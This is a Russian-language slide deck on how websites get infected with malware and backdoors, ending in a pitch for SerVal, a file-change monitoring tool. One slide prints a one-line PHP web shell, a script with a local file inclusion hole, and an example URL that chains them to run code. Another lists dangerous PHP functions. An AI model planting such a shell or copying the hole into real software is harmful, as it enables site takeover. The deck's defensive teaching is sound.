SerVal site monitoring presentation - Презентация SerVal
1. Вирусы, трояны, бекдоры на сайтах:
пути заражения и варианты защиты
Александр Барычев
https://www.facebook.com/barychev.alexander
alexander@barychev.ru
ICQ #143876457 Skype: dimases77
2. Малварь - злонамеренная
программа
●
Вирус — заражение посетителя, через
уязвимости в браузере
●
Троян — управление сайтом, организация
ботнета
●
Спам-скрипт — рассылка спама
●
Размещение ссылок — коды SAPE, Linkfeed,
каталоги ссылок
●
Клоакинг с переадресацией трафика
3. Атакуемые файлы
●
.js, .swf — используется для распространения
вирусов
●
.php, .pl, .cgi — серверные скрипты, через них
можно делать все, хоть сервер Пентагона
брутить
●
.htaccess — установка переадресации (как
клоакинг) на другие сайты, чаще всего по User
Agent
●
.htm, .html — статические ссылочные каталоги,
залитые через Webshell
5. Варианты заражения
●
«Угон» из сохраненных паролей с зараженного
компьютера
●
Через уязвимость на сайте, чаще всего через
форму загрузки файлов на сайт
●
Через уязвимость авторизации в Панели
управления
●
Через многочисленные плагины к популярным
CMS
●
XSS, SQL-injection, LFI
6. Local File Inclusion
avatar.jpg Самый простой WebShell:
<?assert(stripslashes($_REQUEST["e"]));?>
image.php Скрипт с LFI-инъекцией:
<?php
// {..} примитивная проверка, которая часто легко обходится
if (!isset($_GET['file']) OR
!file_exists('./tpl/default/'.$_GET['file']))
die('404 Not Found');
// {..} возможно, проводятся еще какие-то проверки
include './tpl/default/'.$_GET['file']; // локальный инклуд файла
?>
http://site.com/image.php?file=../../upload/avatar.jpg&e=phpinfo();
8. Опасные функции PHP
●
eval() - выполнение произвольного кода
●
assert() - выполнение произвольного кода
●
exec(), shell_exec(), system() - выполнение
команд консоли
●
base64_decode() - декодирование
обфусцированного кода
●
preg_replace() с модификатором e —
выполнение произвольного кода
(запрещено с 2012 года)
9. Кто под угрозой?
●
Пользователи популярных и бесплатных CMS
Wordpress, Joomla
●
Пользователи популярных и платных CMS
●
Любители сохранять пароли в FTP и SCP
клиентах, браузерах
●
Все, кто использует Apache + PHP
●
Любой, у кого есть Вебсервер, который «глядит»
в Интернет
10. Так что же делать?
●
Обновить все серверное ПО до актуальных
версий
●
Провести аудит исходного кода скриптов
●
Установить все апдейты на CMS, на модули,
на плагины
●
Запретить доступ к директориям через http
в .htaccess, которым это не нужно
●
Отслеживать изменения файлов!
12. Как использовать SerVal?
●
Скачать с сайта http://www.serval.site
●
Установить, запустив инсталляцию, на хостинг в
отдельный домен, например, http://serval.moisite.ru,
настроить планировщик задач Cron.
●
Завести проект — сайт который будет мониторится на
изменение файлов
●
Получить уникальный PHP-файл сканера для сайта и
загрузить его на хостинг
●
Обращать внимание на изменения, о которых будет
уведомлять система
http://www.serval.site
19. При этом главное:
●
Быстро выявить взлом
●
Устранить последствия
●
Проанализировать и устранить уязвимость
Взломать могут каждый сайт!
Следите за своими сайтами!
http://www.serval.site
20. В этом поможет вот этот
милый котик!
Скачивайте,
устанавливайте,
пользуйтесь!
http://www.serval.site